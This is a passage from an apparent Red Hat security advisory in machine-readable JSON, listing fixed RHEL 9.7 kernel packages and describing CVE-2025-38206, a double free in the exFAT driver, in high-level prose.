"NFV-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"NFV-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"RT-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x",
"RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Linux kernel: Use-after-free vulnerability in page_pool_recycle_in_ring can lead to arbitrary code execution"
},
{
"cve": "CVE-2025-38206",
"cwe": {
"id": "CWE-763",
"name": "Release of Invalid Pointer or Reference"
},
"discovery_date": "2025-07-04T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2376377"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Linux kernel\u0027s exFAT filesystem driver. A local attacker with low privileges could exploit a double free vulnerability within the `delayed_free` function. This memory corruption flaw can lead to a denial of service (DoS), potentially causing system instability or crashes. It may also result in information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Kernel: Double free vulnerability in exFAT filesystem can lead to denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Moderate impact double free vulnerability in the Linux kernel\u0027s exFAT filesystem driver affects Red Hat Enterprise Linux 9 and 10. A local attacker with a special group privileges could exploit this flaw, leading to a denial of service, system instability, or crashes.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src",
"AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
